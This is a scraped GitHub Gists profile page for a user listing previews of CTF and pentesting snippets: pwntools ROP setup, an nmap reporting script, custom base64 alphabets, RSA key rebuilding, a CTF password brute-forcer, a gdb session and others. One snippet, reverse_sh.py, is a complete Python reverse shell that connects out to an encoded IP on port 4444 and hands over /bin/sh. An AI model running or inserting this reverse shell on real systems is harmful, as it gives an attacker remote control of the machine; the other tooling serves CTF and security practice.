Skip to content

Instantly share code, notes, and snippets.

View tunelko's full-sized avatar

tunelko tunelko

51 followers · 61 following
View GitHub Profile
@tunelko
tunelko / basicrop.py
Created July 18, 2020 09:36
from pwn import *
context(arch='x86_64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
local_bin = "./climb"
@tunelko
tunelko / penmap.sh
Last active May 23, 2020 16:25
#!/bin/sh
# -----------------------------------------------------------------------------
# Author: @tunelko
# Modifier: DiaLluvioso
# -----------------------------------------------------------------------------
# Useful for pentesting on information gathering phase.
# Displays fancy and formatted HTML report generated by xalan.
# note: it requires xalan (xml to html converter) but is installed if needed.
# -----------------------------------------------------------------------------
# * Change nmap arguments as needed !
@tunelko
tunelko / weird_encodings.py
Last active January 10, 2020 21:35
weird_encodings
import base64
import sys
pt = sys.argv[1]
type_encoding = sys.argv[2]
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
@tunelko
tunelko / rsa_corrupted_key.py
Created October 1, 2018 07:13
#!/usr/bin/python
import pyasn1.codec.der.encoder
import pyasn1.type.univ
import base64
# present values on key.pem
e = 0x010001
n = 0xC4B07FEFC8E36C05C0DA434221AEBF47DBF70E5189AD892408F3AD81182A9E0700A07C9D7C66C86C7A39602123EE0F605613DE97FDE49FE68396EE0AF3F5F5F3
p = 106173580239682931389627142547722999257831171755485751420548914984291463023277
@tunelko
tunelko / reverse_sh.py
Created September 21, 2018 09:17
import base64
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((base64.b64decode("base64_str_IP"),4444))
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
@tunelko
tunelko / tcp_raw.py
Created September 21, 2018 09:14
import socket
TCP_IP = '127.0.0.1'
TCP_PORT = 9999
BUFFER_SIZE = 1024
data = b"\x68\x16\x16\x68\x08\x00\x65\x81\x65\x00\x64\x00\x01\x01\x00\x1a\xb5\x13\x8b\x57\x07\x12\x00\x00\x00\x00\x96\x16"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(data)
s.close()
@tunelko
tunelko / webwob.py
Created August 27, 2016 10:16
idsecconf CTF 2016 - web100
#!/usr/bin/env python
import requests
import string
import re
alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits
url='http://128.199.96.39/?password='
m = re.compile('invalid [0-9]')
password = ['a']*4
@tunelko
tunelko / generate_flags.sh
Last active September 19, 2018 17:22
#!/bin/bash
for flags in {1..45}; do echo "$flags: $(openssl rand -hex 16)" >> passwords && for lines in $(cut -f 2 -d ":" passwords); do echo "flag{$lines}" > /home/reto/flag_$flags.txt; done;done
@tunelko
tunelko / prechallenge-RHME2016
Created October 13, 2016 09:23
gdb-peda$ b *0x0000000000400824
Breakpoint 1 at 0x400824
gdb-peda$ disassemble main
=> 0x0000000000400824 <+212>: je 0x400855 <main+261>
gdb-peda$ run
RBX: 0x7fffffffe238 ("TH1S 1s s3cr3t!!")
..
..
Breakpoint 1, 0x0000000000400824 in main ()
@tunelko
tunelko / daemon_jira.py
Created September 19, 2018 17:19
#!/usr/bin/env python
import argparse
# from skeleton.users import models
# from sqlalchemy.exc import SQLAlchemyError
# from collections import Counter
import json
import sys
import requests
"""